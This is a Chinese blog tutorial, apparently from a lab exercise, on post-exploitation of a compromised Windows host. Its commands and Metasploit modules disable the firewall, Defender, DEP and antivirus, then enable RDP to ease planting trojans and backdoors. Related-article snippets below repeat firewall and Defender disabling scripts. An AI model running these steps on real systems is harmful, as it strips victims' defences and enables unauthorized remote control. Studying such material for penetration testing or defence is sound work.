关闭防火墙和杀毒软件并开启远程桌面

最新推荐文章于 2024-07-18 09:45:00 发布
最新推荐文章于 2024-07-18 09:45:00 发布
阅读量1.9k 收藏 10
点赞数
分类专栏: 内网渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/115015169
版权

关闭防火墙

当我们拿下一台主机后,向在主机上留后门和放木马,那么我们的首要任务就是关闭主机的防火墙。因为防火墙会把我们的木马文件拦截。

首先先得到目标主机的管理员权限,并进入shell界面
在这里插入图片描述
在这里插入图片描述
然后在命令行中输入netsh advfirewall set alllprofiles state off,将防火墙成功关闭
在这里插入图片描述

关闭windows Defender和DEP数据执行保护

可以看到计算机的Defender默认是开启的,defend和DEP会拦截我们的恶意操作,所以要将其关闭掉
在这里插入图片描述
然后在命令行中输入net stop windefend关闭defender,键入bcdedit.exe /set {current} nx AlwaysOff关闭DEP数据执行保护
在这里插入图片描述
在这里插入图片描述

关闭杀毒软件

关闭杀软应该是最最重要的一步了,想让木马安全放行,那么杀软必定是一个最大的阻碍。因为我的计算机上没有安装杀软,所以看不到效果,命令是run post/windows/manage/killav
在这里插入图片描述

开启远程桌面

可以看到远程主机上的3389端口是默认不开放的
在这里插入图片描述
现在我们退回到meterpreter命令行中,执行开启远程桌面操作,对目标主机执行更多更方便的操作做准备,首先执行run post/windows/manage/enable_rdp命令
在这里插入图片描述
这里还提供了关闭和清除痕迹的脚本,我们可以看看其中的内容
在这里插入图片描述
可以看到,脚本是通过注册表的方式对远程桌面功能关闭的,并且创建了一个cmd进程,对防火墙的规则也进行了设置

然后我们通过上一节获取的用户名和密码,对目标主机进行远程连接,命令为rdesktop -u pyh -p 12 目标主机的IP地址
在这里插入图片描述
如果我们想看看目标主机的页面截图,我们也可以加载load espia这个插件,然后输入screengrab即可保存目标主机的桌面截图
在这里插入图片描述
然后使用eog这个软件查看保存的图片
在这里插入图片描述
关闭远程桌面,我们运行如下命令即可run multi_console_command -r /root/.msf4/loot/20210319210131_default_192.168.75.139_host.windows.cle_636232.txt后面的txt文件是开启远程桌面时生成的关闭文件,替换掉即可
在这里插入图片描述

平凡的学者
关注
专栏目录
windows server 远程桌面安装和配置
Reyn_观极
05-08 1478
1,在windows serve 2016 上配置远程桌面 1),打开远程登录,允许远程访问虚拟机 2),查看服务端口:netstat -an 命令,可以查看3389端口打开,可以远程桌面了 3),已经远程连接上的IP和端口 2,修改远程桌面的端口 修改远程连接端口3389为 60365: 2.1,打开修改注册表 3,客户端连接 3.1,如下报错 排错: ping 远程服务的IP; 检查端口、防火墙和安装的防毒软件。 防火墙配置:生产环境中打开防火
win10关闭防火墙杀毒软件
Hackeryuan的博客
01-11 1万+
首先右键点击开始按钮,点击运行,输入“control”,点击确定。 然后点击Windows防火墙图标。 单击启用或关闭Windows防火墙。 最后选择关闭Windows防火墙,点击确定即可关闭防火墙。 ...
win10不能被远程解决方案(开启远程桌面,防火墙仍不能被远程解决方案)
墨颜丶缔造非凡
05-29 2万+
开启远程桌面,防火墙仍不能被远程解决方案 1.“Win+R”→“gpedit.msc” 2.依次展开“计算机配置”→“管理模版”→“系统”→“凭据分配”→找到“允许分配保存的凭据用于仅NTLM服务器身份验证” 3.单击“启用”→继续单击“启用”→输入“TERMSRV/*”→确定 4.设置后,输入“Win+R”→输入“gpupdate /force”可强制生效刚才的应用 5.!!!这一
windows系统如何彻底关闭&恢复防火墙?
最新发布
qq_27815483的博客
07-18 5836
本文章主要介绍windows系统如何彻底关闭防火墙和恢复防火墙,已经如何使用reg脚本设置防火墙等。
ubuntu关闭防火墙命令_后渗透利用msf关闭防火墙
weixin_39600885的博客
12-13 211
运行环境:kali工具msf ip:192.168.2.136windows server2008 ip:192.168.2.132已经拿到目标服务器权限,开始后渗透是administrator权限,为了后渗透方便我们需要把目标的服务器的杀毒,防火墙,以及一些防护软件给关闭了。目标服务器防火墙开着,我们要使用我们得到的shell给它关闭关闭windows防火墙需...
kali关闭防火墙_【Web安全】Payload的探索与Kali渗透测试框架-msf
weixin_39875941的博客
11-30 407
1 MSF基本介绍metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的。可以在 kali 中直接使用,命令行msfconsole 即可。1、漏洞利用模块exploits 是漏洞利用模块,漏洞利用是攻击者利用服务器的漏洞进行攻击的一种行为,其中包含了主流漏洞的攻击代码。2、辅助模块auxiliary 是辅助模块,主要用来执行扫描,嗅探,指纹识别等,算是信...
Windows脚本系列之二——使用脚本关闭windows防火墙
weixin_34274029的博客
05-15 435
Windows XP在安装SP2后会自动打开Windows防火墙,这个功能对于个人用户来说,可能是一个很实用的功能,因为它可以在一定程度上保护我们的系统。但是在企业环境中,它却是一块鸡肋,因为我们在企业中有自己的对外防火墙,在内部有企业级的杀毒软件。多一个系统的防火墙作用不大,倒是在我们需要远程管理客户端电脑时,经常受到它的干扰。很多管理员为了方便管理都会关闭它,不过,如果客...
Win10,Win11家庭版开启远程桌面接入功能-有详细操作截屏
Mark的博客
11-26 3万+
文章目录前言1. 下载安装开源的RDP Wrapper软件1.1 下载1.2 安装2. 配置防火墙2.1 打开Windows防火墙2.2 配置允许使用远程桌面访问端口3389的防火墙放行规则3. 确认配置状况4. 问题处理4.1 侦听器没有工作4.2 Windows版本不支持 前言 工作中有时候需要远程控制其它电脑。市面上很多免费的远程控制方法,比如QQ的远程协助,向日葵远程控制,等等,这些软件天生具有穿透内网穿透的功能,是不错的选择。但是考虑到易用性和安全性,只需要在局域网内使用的情况下,windows远
Windows10远程桌面连很慢该怎么办?.docx
09-27
- 关闭可能干扰远程桌面连接的功能。 #### 四、其他建议 - **使用有线网络**:尽可能使用有线网络连接而非无线,以获得更稳定的网络环境。 - **升级硬件**:考虑升级本地计算机或远程服务器的硬件配置,如增加...
网络人远程控桌面软件(免费版)
03-30
网络人远程控桌面软件(免费版),免杀,正版软件!杀毒软件开启也能运行!!不像其他的远控软件一样要关闭杀毒软件防火墙!
系统自带桌面远程连接
05-18
在Windows操作系统中,这一服务通常默认启用,但如果没有,可以在“控制面板”->“程序和功能”->“打开或关闭Windows功能”中勾选“远程桌面服务”。 2. **花生壳的使用** 如果你需要通过互联网进行远程连接,...
后渗透之关闭防火墙杀毒软件开启远程桌面
内心不种满鲜花就会长满杂草
04-13 8317
目录 一. 关闭防火墙 二.关闭windows Defender和DEP数据执行保护 三. 关闭杀毒软件 四. 开启远程桌面 当我们拿下一台主机后,想在主机上留后门,那么我们的首要任务就是关闭主机的防火墙。因为防火墙会把我们的后门程序进行拦截。我们用msf获取到了权限 一. 关闭防火墙 以下是在win7和win2008r2的机器上实验的,在administrator和system的权限下都能成功将防火墙关闭和开启。普通用户不行 1. 在system权限下执行 此时防火墙的状态是开启的.
Windows系统批量禁用Defender杀毒软件
StepTp的博客
05-03 1646
Windows系统批量禁用Defender杀毒软件 文章目录Windows系统批量禁用Defender杀毒软件前言一、禁用方式二、禁用脚本总结 前言 ​ 由于工作需要,需要在windows系统上永久禁用windows defender 杀毒软件且即时生效,但不能重启系统,故编写BAT禁用脚本。 一、禁用方式 编辑组策略。 直接修改注册表键值。 直接卸载Defender服务。 其余。。。 二、禁用脚本 适用范围: 企业版 windows 10,windows 7 。 企业版 windows s
msf 渗透基础篇(基本命令)
失心少年
07-30 2757
以 kali 为例,几个关键路径,熟悉一下,为了更方便的查找。
关闭windows自带杀毒软件Windows defender命令,命令行关闭windows服务
墨痕诉清风的博客
03-26 6937
net stop windefend
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 5214
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
Windows系统如何关闭防火墙保姆式教程,超详细
热门推荐
技术改变命运
10-14 11万+
电脑怎么关闭防火墙
远程链接桌面时,电脑防火墙关闭还是开启状态?
weixin_44400506的博客
01-14 3254
我们在使用远程桌面的时候,到底是要关闭防火墙还是开启防火墙呢?现在我们来看一下对于这个问题的具体分析。   关闭防火墙:   在进行远程桌面连接的时候,如果关闭了防火墙,其实这个是很不安全,会导致危险的入侵,但是关闭了防火墙,远程桌面就不会受到限制,方便我们连接,有些情况在连接远程桌面的时候,是需要把防火墙关掉的。 FTP   开启防火墙:   当我们开启了防火墙,无需置疑,我们的服务器会安全很多...
用bat脚本开启windows7远程桌面关闭防火墙
08-06
### 回答1: 要用bat脚本开启Windows7远程桌面,可以使用以下命令:sc config termservice start= auto,net start termservice。而要关闭Windows7防火墙,可以使用以下命令:netsh firewall set opmode disable。 ### 回答2: 要用bat脚本开启Windows 7远程桌面关闭防火墙,可以按照以下步骤操作: 1. 开启远程桌面: 你可以使用以下命令来设置远程桌面的配置: ``` reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ``` 2. 关闭防火墙: 为了关闭Windows 7的防火墙,你可以使用以下命令: ``` netsh advfirewall set allprofiles state off ``` 将以上两个命令保存到一个文本文件中,并将文件后缀名改为`.bat`,例如`remote_desktop.bat`。 然后运行该bat脚本文件,它将自动执行上述命令。执行成功后,远程桌面应该已经开启,并且防火墙应该已经关闭。 这些操作需要管理员权限来执行。确保以管理员身份运行这个bat脚本文件,否则这些设置可能无法生效。 请注意,关闭防火墙会降低系统的安全性。为了保证系统的安全,建议你在远程桌面连接完成后再重新启用防火墙。可以使用以下命令来重新启用防火墙: ``` netsh advfirewall set allprofiles state on ``` 希望以上回答能对你有所帮助! ### 回答3: 要使用bat脚本开启Windows 7远程桌面关闭防火墙,你可以按照以下步骤进行操作。 开启远程桌面: 1. 打开文本编辑器,如记事本。 2. 在空白处键入以下命令: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 3. 将文件另存为后缀名为.bat的文件,例如"enable_rdp.bat"。 4. 双击运行.bat文件,它会执行命令并开启远程桌面功能。 关闭防火墙: 1. 打开文本编辑器,如记事本。 2. 在空白处键入以下命令: netsh advfirewall set allprofiles state off 3. 将文件另存为后缀名为.bat的文件,例如"disable_firewall.bat"。 4. 双击运行.bat文件,它会执行命令并关闭防火墙。 需要注意的是,使用bat脚本来控制系统设置可能需要管理员权限。因此,在运行.bat文件之前,建议右键单击.bat文件并选择“以管理员身份运行”,以确保脚本能够成功执行。 希望以上内容对您有帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值